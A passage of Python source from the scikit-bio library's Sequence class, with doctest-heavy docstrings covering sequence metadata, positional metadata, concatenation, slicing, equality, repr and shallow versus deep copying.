>>> positional_metadata = {'quality': [3, 3, 4, 10],
... 'exons': [True, True, False, True]}
>>> seq = Sequence('ACGT', metadata=metadata,
... positional_metadata=positional_metadata)
>>> seq
Sequence
-----------------------------
Metadata:
'authors': <class 'list'>
'desc': 'seq desc'
'id': 'seq-id'
Positional metadata:
'exons': <dtype: bool>
'quality': <dtype: int64>
Stats:
length: 4
-----------------------------
0 ACGT
**Retrieving underlying sequence data:**
Retrieve underlying sequence:
>>> seq.values # doctest: +NORMALIZE_WHITESPACE
array([b'A', b'C', b'G', b'T'],
dtype='|S1')
Underlying sequence immutable:
>>> seq.values = np.array([b'T', b'C', b'G', b'A'], dtype='|S1')
Traceback (most recent call last):
...
AttributeError: can't set attribute
>>> seq.values[0] = b'T'
Traceback (most recent call last):
...
ValueError: assignment destination is read-only
**Retrieving sequence metadata:**
Retrieve metadata:
>>> pprint(seq.metadata) # using pprint to display dict in sorted order
{'authors': ['Alice'], 'desc': 'seq desc', 'id': 'seq-id'}
Retrieve positional metadata:
>>> seq.positional_metadata
exons quality
0 True 3
1 True 3
2 False 4
3 True 10
**Updating sequence metadata:**
.. warning:: Be aware that a shallow copy of ``metadata`` and
``positional_metadata`` is made for performance. Since a deep copy is
not made, changes made to mutable Python objects stored as metadata may
affect the metadata of other ``Sequence`` objects or anything else that
shares a reference to the object. The following examples illustrate this
behavior.
First, let's create a sequence and update its metadata:
>>> metadata = {'id':'seq-id', 'desc':'seq desc', 'authors': ['Alice']}
>>> seq = Sequence('ACGT', metadata=metadata)
>>> seq.metadata['id'] = 'new-id'
>>> seq.metadata['pubmed'] = 12345
>>> pprint(seq.metadata)
{'authors': ['Alice'], 'desc': 'seq desc', 'id': 'new-id', 'pubmed': 12345}
Note that the original metadata dictionary (stored in variable
``metadata``) hasn't changed because a shallow copy was made:
>>> pprint(metadata)
{'authors': ['Alice'], 'desc': 'seq desc', 'id': 'seq-id'}
>>> seq.metadata == metadata
False
Note however that since only a *shallow* copy was made, updates to mutable
objects will also change the original metadata dictionary:
>>> seq.metadata['authors'].append('Bob')
>>> seq.metadata['authors']
['Alice', 'Bob']
>>> metadata['authors']
['Alice', 'Bob']
This behavior can also occur when manipulating a sequence that has been
derived from another sequence:
>>> subseq = seq[1:3]
>>> subseq
Sequence
-----------------------------
Metadata:
'authors': <class 'list'>
'desc': 'seq desc'
'id': 'new-id'
'pubmed': 12345
Stats:
length: 2
-----------------------------
0 CG
>>> pprint(subseq.metadata)
{'authors': ['Alice', 'Bob'],
'desc': 'seq desc',
'id': 'new-id',
'pubmed': 12345}
The subsequence has inherited the metadata of its parent sequence. If we
update the subsequence's author list, we see the changes propagated in the
parent sequence and original metadata dictionary:
>>> subseq.metadata['authors'].append('Carol')
>>> subseq.metadata['authors']
['Alice', 'Bob', 'Carol']
>>> seq.metadata['authors']
['Alice', 'Bob', 'Carol']
>>> metadata['authors']
['Alice', 'Bob', 'Carol']
The behavior for updating positional metadata is similar. Let's create a
new sequence with positional metadata that is already stored in a
``pd.DataFrame``:
>>> positional_metadata = pd.DataFrame(
... {'quality': [3, 3, 4, 10], 'list': [[], [], [], []]})
>>> seq = Sequence('ACGT', positional_metadata=positional_metadata)
>>> seq
Sequence
-----------------------------
Positional metadata:
'list': <dtype: object>
'quality': <dtype: int64>
Stats:
length: 4
-----------------------------
0 ACGT
>>> seq.positional_metadata
list quality
0 [] 3
1 [] 3
2 [] 4
3 [] 10
Now let's update the sequence's positional metadata by adding a new column
and changing a value in another column:
>>> seq.positional_metadata['gaps'] = [False, False, False, False]
>>> seq.positional_metadata.loc[0, 'quality'] = 999
>>> seq.positional_metadata
list quality gaps
0 [] 999 False
1 [] 3 False
2 [] 4 False
3 [] 10 False
Note that the original positional metadata (stored in variable
``positional_metadata``) hasn't changed because a shallow copy was made:
>>> positional_metadata
list quality
0 [] 3
1 [] 3
2 [] 4
3 [] 10
>>> seq.positional_metadata.equals(positional_metadata)
False
Next let's create a sequence that has been derived from another sequence:
>>> subseq = seq[1:3]
>>> subseq
Sequence
-----------------------------
Positional metadata:
'list': <dtype: object>
'quality': <dtype: int64>
'gaps': <dtype: bool>
Stats:
length: 2
-----------------------------
0 CG
>>> subseq.positional_metadata
list quality gaps
0 [] 3 False
1 [] 4 False
As described above for metadata, since only a *shallow* copy was made of
the positional metadata, updates to mutable objects will also change the
parent sequence's positional metadata and the original positional metadata
``pd.DataFrame``:
>>> subseq.positional_metadata.loc[0, 'list'].append('item')
>>> subseq.positional_metadata
list quality gaps
0 [item] 3 False
1 [] 4 False
>>> seq.positional_metadata
list quality gaps
0 [] 999 False
1 [item] 3 False
2 [] 4 False
3 [] 10 False
>>> positional_metadata
list quality
0 [] 3
1 [item] 3
2 [] 4
3 [] 10
"""
_number_of_extended_ascii_codes = 256
# ASCII is built such that the difference between uppercase and lowercase
# is the 6th bit.
_ascii_invert_case_bit_offset = 32
_ascii_lowercase_boundary = 90
default_write_format = 'fasta'
__hash__ = None
@property
@stable(as_of="0.4.0")
def values(self):
"""Array containing underlying sequence characters.
Notes
-----
This property is not writeable.
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('AACGA')
>>> s.values # doctest: +NORMALIZE_WHITESPACE
array([b'A', b'A', b'C', b'G', b'A'],
dtype='|S1')
"""
return self._bytes.view('|S1')
@property
@stable(as_of="0.4.0")
def metadata(self):
"""``dict`` containing metadata which applies to the entire sequence.
Notes
-----
This property can be set and deleted.
Examples
--------
>>> from pprint import pprint
>>> from skbio import Sequence
Create a sequence with metadata:
>>> s = Sequence('ACGTACGTACGTACGT',
... metadata={'id': 'seq-id',
... 'description': 'seq description'})
>>> s
Sequence
------------------------------------
Metadata:
'description': 'seq description'
'id': 'seq-id'
Stats:
length: 16
------------------------------------
0 ACGTACGTAC GTACGT
Retrieve metadata:
>>> pprint(s.metadata) # using pprint to display dict in sorted order
{'description': 'seq description', 'id': 'seq-id'}
Update metadata:
>>> s.metadata['id'] = 'new-id'
>>> s.metadata['pubmed'] = 12345
>>> pprint(s.metadata)
{'description': 'seq description', 'id': 'new-id', 'pubmed': 12345}
Set metadata:
>>> s.metadata = {'abc': 123}
>>> s.metadata
{'abc': 123}
Delete metadata:
>>> s.has_metadata()
True
>>> del s.metadata
>>> s.metadata
{}
>>> s.has_metadata()
False
"""
if self._metadata is None:
# not using setter to avoid copy
self._metadata = {}
return self._metadata
@metadata.setter
def metadata(self, metadata):
if not isinstance(metadata, dict):
raise TypeError("metadata must be a dict")
# shallow copy
self._metadata = metadata.copy()
@metadata.deleter
def metadata(self):
self._metadata = None
@property
@stable(as_of="0.4.0")
def positional_metadata(self):
"""``pd.DataFrame`` containing metadata on a per-character basis.
Notes
-----
This property can be set and deleted.
Examples
--------
Create a DNA sequence with positional metadata:
>>> from skbio import DNA
>>> seq = DNA(
... 'ACGT',
... positional_metadata={'quality': [3, 3, 20, 11],
... 'exons': [True, True, False, True]})
>>> seq
DNA
-----------------------------
Positional metadata:
'exons': <dtype: bool>
'quality': <dtype: int64>
Stats:
length: 4
has gaps: False
has degenerates: False
has non-degenerates: True
GC-content: 50.00%
-----------------------------
0 ACGT
Retrieve positional metadata:
>>> seq.positional_metadata
exons quality
0 True 3
1 True 3
2 False 20
3 True 11
Update positional metadata:
>>> seq.positional_metadata['gaps'] = seq.gaps()
>>> seq.positional_metadata
exons quality gaps
0 True 3 False
1 True 3 False
2 False 20 False
3 True 11 False
Set positional metadata:
>>> seq.positional_metadata = {'degenerates': seq.degenerates()}
>>> seq.positional_metadata
degenerates
0 False
1 False
2 False
3 False
Delete positional metadata:
>>> seq.has_positional_metadata()
True
>>> del seq.positional_metadata
>>> seq.positional_metadata
Empty DataFrame
Columns: []
Index: [0, 1, 2, 3]
>>> seq.has_positional_metadata()
False
"""
if self._positional_metadata is None:
# not using setter to avoid copy
self._positional_metadata = pd.DataFrame(
index=np.arange(len(self)))
return self._positional_metadata
@positional_metadata.setter
def positional_metadata(self, positional_metadata):
try:
# copy=True to copy underlying data buffer
positional_metadata = pd.DataFrame(positional_metadata, copy=True)
except pd.core.common.PandasError as e:
raise TypeError('Positional metadata invalid. Must be consumable '
'by pd.DataFrame. Original pandas error message: '
'"%s"' % e)
num_rows = len(positional_metadata.index)
if num_rows != len(self):
raise ValueError(
"Number of positional metadata values (%d) must match the "
"number of characters in the sequence (%d)." %
(num_rows, len(self)))
positional_metadata.reset_index(drop=True, inplace=True)
self._positional_metadata = positional_metadata
@positional_metadata.deleter
def positional_metadata(self):
self._positional_metadata = None
@property
@experimental(as_of="0.4.0-dev")
def observed_chars(self):
"""Set of observed characters in the sequence.
Notes
-----
This property is not writeable.
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('AACGAC')
>>> s.observed_chars == {'G', 'A', 'C'}
True
"""
return set(str(self))
@property
def _string(self):
return self._bytes.tostring()
@classonlymethod
@experimental(as_of="0.4.0-dev")
def concat(cls, sequences, how='strict'):
"""Concatenate an iterable of ``Sequence`` objects.
Parameters
----------
seqs : iterable (Sequence)
An iterable of ``Sequence`` objects or appropriate subclasses.
how : {'strict', 'inner', 'outer'}, optional
How to intersect the `positional_metadata` of the sequences.
If 'strict': the `positional_metadata` must have the exact same
columns; 'inner': an inner-join of the columns (only the shared set
of columns are used); 'outer': an outer-join of the columns
(all columns are used: missing values will be padded with NaN).
Returns
-------
Sequence
The returned sequence will be an instance of the class which
called this class-method.
Raises
------
ValueError
If `how` is not one of: 'strict', 'inner', or 'outer'.
ValueError
If `how` is 'strict' and the `positional_metadata` of each sequence
does not have the same columns.
TypeError
If the sequences cannot be cast as the calling class.
Notes
-----
The sequence-wide metadata (``Sequence.metadata``) is not retained
during concatentation.
Sequence objects can be cast to a different type only when the new
type is an ancestor or child of the original type. Casting between
sibling types is not allowed, e.g. ``DNA`` -> ``RNA`` is not
allowed, but ``DNA`` -> ``Sequence`` or ``Sequence`` -> ``DNA``
would be.
Examples
--------
Concatenate two DNA sequences into a new DNA object:
>>> from skbio import DNA, Sequence
>>> s1 = DNA("ACGT")
>>> s2 = DNA("GGAA")
>>> DNA.concat([s1, s2])
DNA
-----------------------------
Stats:
length: 8
has gaps: False
has degenerates: False
has non-degenerates: True
GC-content: 50.00%
-----------------------------
0 ACGTGGAA
Concatenate DNA sequences into a Sequence object (type coercion):
>>> Sequence.concat([s1, s2])
Sequence
-------------
Stats:
length: 8
-------------
0 ACGTGGAA
Positional metadata is conserved:
>>> s1 = DNA('AcgT', lowercase='one')
>>> s2 = DNA('GGaA', lowercase='one',
... positional_metadata={'two': [1, 2, 3, 4]})
>>> result = DNA.concat([s1, s2], how='outer')
>>> result
DNA
-----------------------------
Positional metadata:
'one': <dtype: bool>
'two': <dtype: float64>
Stats:
length: 8
has gaps: False
has degenerates: False
has non-degenerates: True
GC-content: 50.00%
-----------------------------
0 ACGTGGAA
>>> result.positional_metadata
one two
0 False NaN
1 True NaN
2 True NaN
3 False NaN
4 False 1
5 False 2
6 True 3
7 False 4
"""
if how not in {'strict', 'inner', 'outer'}:
raise ValueError("`how` must be 'strict', 'inner', or 'outer'.")
seqs = list(sequences)
for seq in seqs:
seq._assert_can_cast_to(cls)
if how == 'strict':
how = 'inner'
cols = []
for s in seqs:
if s.has_positional_metadata():
cols.append(frozenset(s.positional_metadata))
else:
cols.append(frozenset())
if len(set(cols)) > 1:
raise ValueError("The positional metadata of the sequences do"
" not have matching columns. Consider setting"
" how='inner' or how='outer'")
seq_data = []
pm_data = []
for seq in seqs:
seq_data.append(seq._bytes)
pm_data.append(seq.positional_metadata)
if not seq.has_positional_metadata():
del seq.positional_metadata
pm = pd.concat(pm_data, join=how, ignore_index=True)
bytes_ = np.concatenate(seq_data)
return cls(bytes_, positional_metadata=pm)
@classmethod
def _assert_can_cast_to(cls, target):
if not (issubclass(cls, target) or issubclass(target, cls)):
raise TypeError("Cannot cast %r as %r." %
(cls.__name__, target.__name__))
@stable(as_of="0.4.0")
def __init__(self, sequence, metadata=None, positional_metadata=None,
lowercase=False):
if isinstance(sequence, np.ndarray):
if sequence.dtype == np.uint8:
self._set_bytes_contiguous(sequence)
elif sequence.dtype == '|S1':
sequence = sequence.view(np.uint8)
# Guarantee the sequence is an array (might be scalar before
# this).
if sequence.shape == ():
sequence = np.array([sequence], dtype=np.uint8)
self._set_bytes_contiguous(sequence)
else:
raise TypeError(
"Can only create sequence from numpy.ndarray of dtype "
"np.uint8 or '|S1'. Invalid dtype: %s" %
sequence.dtype)
elif isinstance(sequence, Sequence):
# Sequence casting is acceptable between direct
# decendants/ancestors
sequence._assert_can_cast_to(type(self))
# we're not simply accessing sequence.metadata in order to avoid
# creating "empty" metadata representations on both sequence
# objects if they don't have metadata. same strategy is used below
# for positional metadata
if metadata is None and sequence.has_metadata():
metadata = sequence.metadata
if (positional_metadata is None and
sequence.has_positional_metadata()):
positional_metadata = sequence.positional_metadata
sequence = sequence._bytes
self._owns_bytes = False
self._set_bytes(sequence)
else:
# Python 3 will not raise a UnicodeEncodeError so we force it by
# encoding it as ascii
if isinstance(sequence, six.text_type):
sequence = sequence.encode("ascii")
s = np.fromstring(sequence, dtype=np.uint8)
# There are two possibilities (to our knowledge) at this point:
# Either the sequence we were given was something string-like,
# (else it would not have made it past fromstring), or it was a
# numpy scalar, and so our length must be 1.
if isinstance(sequence, np.generic) and len(s) != 1:
raise TypeError("Can cannot create a sequence with %r" %
type(sequence).__name__)
sequence = s
self._owns_bytes = True
self._set_bytes(sequence)
if metadata is None:
self._metadata = None
else:
self.metadata = metadata
if positional_metadata is None:
self._positional_metadata = None
else:
self.positional_metadata = positional_metadata
if lowercase is False:
pass
elif lowercase is True or isinstance(lowercase, six.string_types):
lowercase_mask = self._bytes > self._ascii_lowercase_boundary
self._convert_to_uppercase(lowercase_mask)
# If it isn't True, it must be a string_type
if not (lowercase is True):
self.positional_metadata[lowercase] = lowercase_mask
else:
raise TypeError("lowercase keyword argument expected a bool or "
"string, but got %s" % type(lowercase))
def _set_bytes_contiguous(self, sequence):
"""Munge the sequence data into a numpy array of dtype uint8."""
if not sequence.flags['C_CONTIGUOUS']:
# numpy doesn't support views of non-contiguous arrays. Since we're
# making heavy use of views internally, and users may also supply
# us with a view, make sure we *always* store a contiguous array to
# avoid hard-to-track bugs. See
# https://github.com/numpy/numpy/issues/5716
sequence = np.ascontiguousarray(sequence)
self._owns_bytes = True
else:
self._owns_bytes = False
self._set_bytes(sequence)
def _set_bytes(self, sequence):
sequence.flags.writeable = False
self._bytes = sequence
def _convert_to_uppercase(self, lowercase):
if np.any(lowercase):
with self._byte_ownership():
self._bytes[lowercase] ^= self._ascii_invert_case_bit_offset
@stable(as_of="0.4.0")
def __contains__(self, subsequence):
"""Determine if a subsequence is contained in the biological sequence.
Parameters
----------
subsequence : str, Sequence, or 1D np.ndarray (np.uint8 or '\|S1')
The putative subsequence.
Returns
-------
bool
Indicates whether `subsequence` is contained in the biological
sequence.
Raises
------
TypeError
If `subsequence` is a ``Sequence`` object with a different type
than the biological sequence.
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('GGUCGUGAAGGA')
>>> 'GGU' in s
True
>>> 'CCC' in s
False
"""
return self._munge_to_bytestring(subsequence, "in") in self._string
@stable(as_of="0.4.0")
def __eq__(self, other):
"""Determine if the biological sequence is equal to another.
Biological sequences are equal if they are *exactly* the same type and
their sequence characters, metadata, and positional metadata are the
same.
Parameters
----------
other : Sequence
Sequence to test for equality against.
Returns
-------
bool
Indicates whether the biological sequence is equal to `other`.
Examples
--------
Define two biological sequences that have the same underlying sequence
of characters:
>>> from skbio import Sequence
>>> s = Sequence('ACGT')
>>> t = Sequence('ACGT')
The two sequences are considered equal because they are the same type,
their underlying sequence of characters are the same, and their
optional metadata attributes (``metadata`` and ``positional_metadata``)
were not provided:
>>> s == t
True
>>> t == s
True
Define another biological sequence with a different sequence of
characters than the previous two biological sequences:
>>> u = Sequence('ACGA')
>>> u == t
False
Define a biological sequence with the same sequence of characters as
``u`` but with different metadata and positional metadata:
>>> v = Sequence('ACGA', metadata={'id': 'abc'},
... positional_metadata={'quality':[1, 5, 3, 3]})
The two sequences are not considered equal because their metadata and
positional metadata do not match:
>>> u == v
False
"""
# checks ordered from least to most expensive
if self.__class__ != other.__class__:
return False
# we're not simply comparing self.metadata to other.metadata in order
# to avoid creating "empty" metadata representations on the sequence
# objects if they don't have metadata. same strategy is used below for
# positional metadata
if self.has_metadata() and other.has_metadata():
if self.metadata != other.metadata:
return False
elif not (self.has_metadata() or other.has_metadata()):
# both don't have metadata
pass
else:
# one has metadata while the other does not
return False
if self._string != other._string:
return False
if self.has_positional_metadata() and other.has_positional_metadata():
if not self.positional_metadata.equals(other.positional_metadata):
return False
elif not (self.has_positional_metadata() or
other.has_positional_metadata()):
# both don't have positional metadata
pass
else:
# one has positional metadata while the other does not
return False
return True
@stable(as_of="0.4.0")
def __ne__(self, other):
"""Determine if the biological sequence is not equal to another.
Biological sequences are not equal if they are not *exactly* the same
type, or their sequence characters, metadata, or positional metadata
differ.
Parameters
----------
other : Sequence
Sequence to test for inequality against.
Returns
-------
bool
Indicates whether the biological sequence is not equal to `other`.
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('ACGT')
>>> t = Sequence('ACGT')
>>> s != t
False
>>> u = Sequence('ACGA')
>>> u != t
True
>>> v = Sequence('ACGA', metadata={'id': 'v'})
>>> u != v
True
"""
return not (self == other)
@stable(as_of="0.4.0")
def __getitem__(self, indexable):
"""Slice the biological sequence.
Parameters
----------
indexable : int, slice, iterable (int and slice), 1D array_like (bool)
The position(s) to return from the biological sequence. If
`indexable` is an iterable of integers, these are assumed to be
indices in the sequence to keep. If `indexable` is a 1D
``array_like`` of booleans, these are assumed to be the positions
in the sequence to keep.
Returns
-------
Sequence
New biological sequence containing the position(s) specified by
`indexable` in the current biological sequence. If quality scores
are present, they will be sliced in the same manner and included in
the returned biological sequence. ID and description are also
included.
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('GGUCGUGAAGGA')
Obtain a single character from the biological sequence:
>>> s[1]
Sequence
-------------
Stats:
length: 1
-------------
0 G
Obtain a slice:
>>> s[7:]
Sequence
-------------
Stats:
length: 5
-------------
0 AAGGA
Obtain characters at the following indices:
>>> s[[3, 4, 7, 0, 3]]
Sequence
-------------
Stats:
length: 5
-------------
0 CGAGC
Obtain characters at positions evaluating to `True`:
>>> s = Sequence('GGUCG')
>>> index = [True, False, True, 'a' is 'a', False]
>>> s[index]
Sequence
-------------
Stats:
length: 3
-------------
0 GUC
"""
if (not isinstance(indexable, np.ndarray) and
((not isinstance(indexable, six.string_types)) and
hasattr(indexable, '__iter__'))):
indexable_ = indexable
indexable = np.asarray(indexable)
if indexable.dtype == object:
indexable = list(indexable_) # TODO: Don't blow out memory
if len(indexable) == 0:
# indexing with an empty list, so convert to ndarray and
# fall through to ndarray slicing below
indexable = np.asarray(indexable)
else:
seq = np.concatenate(
list(_slices_from_iter(self._bytes, indexable)))
index = _as_slice_if_single_index(indexable)
positional_metadata = None
if self.has_positional_metadata():
pos_md_slices = list(_slices_from_iter(
self.positional_metadata, index))
positional_metadata = pd.concat(pos_md_slices)
return self._to(sequence=seq,
positional_metadata=positional_metadata)
elif (isinstance(indexable, six.string_types) or
isinstance(indexable, bool)):
raise IndexError("Cannot index with %s type: %r" %
(type(indexable).__name__, indexable))
if (isinstance(indexable, np.ndarray) and
indexable.dtype == bool and
len(indexable) != len(self)):
raise IndexError("An boolean vector index must be the same length"
" as the sequence (%d, not %d)." %
(len(self), len(indexable)))
if isinstance(indexable, np.ndarray) and indexable.size == 0:
# convert an empty ndarray to a supported dtype for slicing a numpy
# array
indexable = indexable.astype(int)
seq = self._bytes[indexable]
positional_metadata = self._slice_positional_metadata(indexable)
return self._to(sequence=seq, positional_metadata=positional_metadata)
def _slice_positional_metadata(self, indexable):
if self.has_positional_metadata():
if _is_single_index(indexable):
index = _single_index_to_slice(indexable)
else:
index = indexable
return self.positional_metadata.iloc[index]
else:
return None
@stable(as_of="0.4.0")
def __len__(self):
"""Return the number of characters in the biological sequence.
Returns
-------
int
The length of the biological sequence.
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('GGUC')
>>> len(s)
4
"""
return self._bytes.size
@stable(as_of="0.4.0")
def __bool__(self):
"""Returns truth value (truthiness) of sequence.
Returns
-------
bool
True if length of sequence is greater than 0, else False.
Examples
--------
>>> from skbio import Sequence
>>> bool(Sequence(''))
False
>>> bool(Sequence('ACGT'))
True
"""
return len(self) > 0
__nonzero__ = __bool__
@stable(as_of="0.4.0")
def __iter__(self):
"""Iterate over positions in the biological sequence.
Yields
------
Sequence
Single character subsequence, one for each position in the
sequence.
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('GGUC')
>>> for c in s:
... str(c)
'G'
'G'
'U'
'C'
"""
for i in range(len(self)):
yield self[i]
@stable(as_of="0.4.0")
def __reversed__(self):
"""Iterate over positions in the biological sequence in reverse order.
Yields
------
Sequence
Single character subsequence, one for each position in the
sequence.
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('GGUC')
>>> for c in reversed(s):
... str(c)
'C'
'U'
'G'
'G'
"""
return iter(self[::-1])
@stable(as_of="0.4.0")
def __str__(self):
"""Return biological sequence characters as a string.
Returns
-------
str
Sequence characters as a string. No metadata or positional
metadata will be included.
See Also
--------
sequence
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('GGUCGUAAAGGA', metadata={'id':'hello'})
>>> str(s)
'GGUCGUAAAGGA'
"""
return str(self._string.decode("ascii"))
@stable(as_of="0.4.0")
def __repr__(self):
r"""Return a string representation of the biological sequence object.
Representation includes:
* sequence type
* metadata keys and values: will display key/value if it is an
understood type, otherwise just the type will be displayed. If it is
an understood type whose representation is too long, just the type
will be displayed
* positional metadata: column names and column dtypes will be displayed
in the order they appear in the positional metadata ``pd.DataFrame``.
Column names (i.e., keys) follow the same display rules as metadata
keys
* sequence stats (e.g., length)
* up to five lines of chunked sequence data. Each line of chunked
sequence data displays the current position in the sequence
Returns
-------
str
String representation of the biological sequence object.
Notes
-----
Subclasses can override Sequence._repr_stats to provide custom
statistics.
Examples
--------
Short sequence without metadata:
>>> from skbio import Sequence
>>> Sequence('ACGTAATGGATACGTAATGCA')
Sequence
-------------------------
Stats:
length: 21
-------------------------
0 ACGTAATGGA TACGTAATGC A
Longer sequence displays first two lines and last two lines:
>>> Sequence('ACGT' * 100)
Sequence
---------------------------------------------------------------------
Stats:
length: 400
---------------------------------------------------------------------
0 ACGTACGTAC GTACGTACGT ACGTACGTAC GTACGTACGT ACGTACGTAC GTACGTACGT
60 ACGTACGTAC GTACGTACGT ACGTACGTAC GTACGTACGT ACGTACGTAC GTACGTACGT
...
300 ACGTACGTAC GTACGTACGT ACGTACGTAC GTACGTACGT ACGTACGTAC GTACGTACGT
360 ACGTACGTAC GTACGTACGT ACGTACGTAC GTACGTACGT
Sequence with metadata and positional metadata:
>>> metadata = {
... 'id': 'seq-id',
... 'description': 'description of the sequence, wrapping across '
... 'lines if it\'s too long',
... 'authors': ['Alice', 'Bob', 'Carol'],
... 'year': 2015,
... 'published': True
... }
>>> positional_metadata = {
... 'quality': [3, 10, 11, 10],
... 'exons': [True, True, False, True]
... }
>>> Sequence('ACGT', metadata=metadata,
... positional_metadata=positional_metadata)
Sequence
----------------------------------------------------------------------
Metadata:
'authors': <class 'list'>
'description': "description of the sequence, wrapping across lines
if it's too long"
'id': 'seq-id'
'published': True
'year': 2015
Positional metadata:
'exons': <dtype: bool>
'quality': <dtype: int64>
Stats:
length: 4
----------------------------------------------------------------------
0 ACGT
"""
return _SequenceReprBuilder(
seq=self,
width=71, # 79 for pep8, 8 space indent for docstrings
indent=4,
chunk_size=10).build()
def _repr_stats(self):
"""Define statistics to display in the sequence's repr.
Subclasses can override this method to provide type-specific
statistics.
This method computes a single statistic: length.
Returns
-------
list
List of tuples where each tuple represents a statistic. Each tuple
contains exactly two ``str`` elements: the statistic's name/label,
and the str-formatted value of the statistic. Ordering of
statistics (i.e., list order) determines display order in the
sequence repr.
"""
return [('length', '%d' % len(self))]
@stable(as_of="0.4.0")
def __copy__(self):
"""Return a shallow copy of the biological sequence.
See Also
--------
copy
Notes
-----
This method is equivalent to ``seq.copy(deep=False)``.
"""
return self.copy(deep=False)
@stable(as_of="0.4.0")
def __deepcopy__(self, memo):
"""Return a deep copy of the biological sequence.
See Also
--------
copy
Notes
-----
This method is equivalent to ``seq.copy(deep=True)``.
"""
return self._copy(True, memo)
@stable(as_of="0.4.0")
def has_metadata(self):
"""Determine if the sequence contains metadata.
Returns
-------
bool
Indicates whether the sequence has metadata
Examples
--------
>>> from skbio import DNA
>>> s = DNA('ACACGACGTT')
>>> s.has_metadata()
False
>>> t = DNA('ACACGACGTT', metadata={'id': 'seq-id'})
>>> t.has_metadata()
True
"""
return self._metadata is not None and bool(self.metadata)
@stable(as_of="0.4.0")
def has_positional_metadata(self):
"""Determine if the sequence contains positional metadata.
Returns
-------
bool
Indicates whether the sequence has positional metadata
Examples
--------
>>> from skbio import DNA
>>> s = DNA('ACACGACGTT')
>>> s.has_positional_metadata()
False
>>> t = DNA('ACACGACGTT', positional_metadata={'quality': range(10)})
>>> t.has_positional_metadata()
True
"""
return (self._positional_metadata is not None and
len(self.positional_metadata.columns) > 0)
@stable(as_of="0.4.0")
def copy(self, deep=False):
"""Return a copy of the biological sequence.
Parameters
----------
deep : bool, optional
Perform a deep copy. If ``False``, perform a shallow copy.
Returns
-------
Sequence
Copy of the biological sequence.
Notes
-----
Since sequence objects can share the same underlying immutable sequence
data (or pieces of it), this method can be used to create a sequence
object with its own copy of the sequence data so that the original
sequence data can be garbage-collected.
Examples
--------
Create a sequence:
>>> from pprint import pprint
>>> from skbio import Sequence
>>> seq = Sequence('ACGT',
... metadata={'id': 'seq-id', 'authors': ['Alice']},
... positional_metadata={'quality': [7, 10, 8, 5],
... 'list': [[], [], [], []]})
Make a shallow copy of the sequence:
>>> seq_copy = seq.copy()
>>> seq_copy == seq
True
Setting new references in the copied sequence's metadata doesn't affect
the original sequence's metadata:
>>> seq_copy.metadata['id'] = 'new-id'
>>> pprint(seq_copy.metadata)
{'authors': ['Alice'], 'id': 'new-id'}
>>> pprint(seq.metadata)
{'authors': ['Alice'], 'id': 'seq-id'}
The same applies to the sequence's positional metadata:
>>> seq_copy.positional_metadata.loc[0, 'quality'] = 999
>>> seq_copy.positional_metadata
list quality
0 [] 999
1 [] 10
2 [] 8
3 [] 5
>>> seq.positional_metadata
list quality
0 [] 7
1 [] 10
2 [] 8
3 [] 5
Since only a *shallow* copy was made, updates to mutable objects stored
as metadata affect the original sequence's metadata:
>>> seq_copy.metadata['authors'].append('Bob')
>>> pprint(seq_copy.metadata)
{'authors': ['Alice', 'Bob'], 'id': 'new-id'}
>>> pprint(seq.metadata)
{'authors': ['Alice', 'Bob'], 'id': 'seq-id'}
The same applies to the sequence's positional metadata:
>>> seq_copy.positional_metadata.loc[0, 'list'].append(1)
>>> seq_copy.positional_metadata
list quality
0 [1] 999
1 [] 10
2 [] 8
3 [] 5
>>> seq.positional_metadata
list quality
0 [1] 7
1 [] 10
2 [] 8
3 [] 5
Perform a deep copy to avoid this behavior:
>>> seq_deep_copy = seq.copy(deep=True)
Updates to mutable objects no longer affect the original sequence's
metadata:
>>> seq_deep_copy.metadata['authors'].append('Carol')
>>> pprint(seq_deep_copy.metadata)
{'authors': ['Alice', 'Bob', 'Carol'], 'id': 'seq-id'}
>>> pprint(seq.metadata)
{'authors': ['Alice', 'Bob'], 'id': 'seq-id'}
Nor its positional metadata:
>>> seq_deep_copy.positional_metadata.loc[0, 'list'].append(2)
>>> seq_deep_copy.positional_metadata
list quality
0 [1, 2] 7
1 [] 10
2 [] 8
3 [] 5
>>> seq.positional_metadata
list quality
0 [1] 7
1 [] 10
2 [] 8
3 [] 5
"""
return self._copy(deep, {})
def _copy(self, deep, memo):
# strategy: copy the sequence without metadata first, then set metadata
# attributes with copies. we take this approach instead of simply
# passing the metadata through the Sequence constructor because we
# don't want to copy twice (this could happen when deep=True, where we
# deep copy here and then shallow copy in the Sequence constructor). we
# also directly set the private metadata attributes instead of using
# their public setters to avoid an unnecessary copy
# we don't make a distinction between deep vs. shallow copy of bytes
# because dtype=np.uint8. we only need to make the distinction when
# dealing with object dtype
bytes = np.copy(self._bytes)
seq_copy = self._constructor(sequence=bytes, metadata=None,
positional_metadata=None)
if self.has_metadata():
metadata = self.metadata
if deep:
metadata = copy.deepcopy(metadata, memo)
else:
metadata = metadata.copy()
seq_copy._metadata = metadata
if self.has_positional_metadata():
positional_metadata = self.positional_metadata
if deep:
positional_metadata = copy.deepcopy(positional_metadata, memo)
else:
# deep=True makes a shallow copy of the underlying data buffer
positional_metadata = positional_metadata.copy(deep=True)
seq_copy._positional_metadata = positional_metadata
return seq_copy
@stable(as_of='0.4.0')
def lowercase(self, lowercase):
"""Return a case-sensitive string representation of the sequence.
Parameters
----------
lowercase: str or boolean vector
If lowercase is a boolean vector, it is used to set sequence
characters to lowercase in the output string. True values in the
boolean vector correspond to lowercase characters. If lowercase
is a str, it is treated like a key into the positional metadata,
pointing to a column which must be a boolean vector.
That boolean vector is then used as described previously.
Returns
-------
str
String representation of sequence with specified characters set to
lowercase.
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('ACGT')
>>> s.lowercase([True, True, False, False])
'acGT'
>>> s = Sequence('ACGT',
... positional_metadata={
... 'exons': [True, False, False, True]})
>>> s.lowercase('exons')
'aCGt'
Constructor automatically populates a column in positional metadata
when the ``lowercase`` keyword argument is provided with a column name:
>>> s = Sequence('ACgt', lowercase='introns')
>>> s.lowercase('introns')
'ACgt'
>>> s = Sequence('ACGT', lowercase='introns')
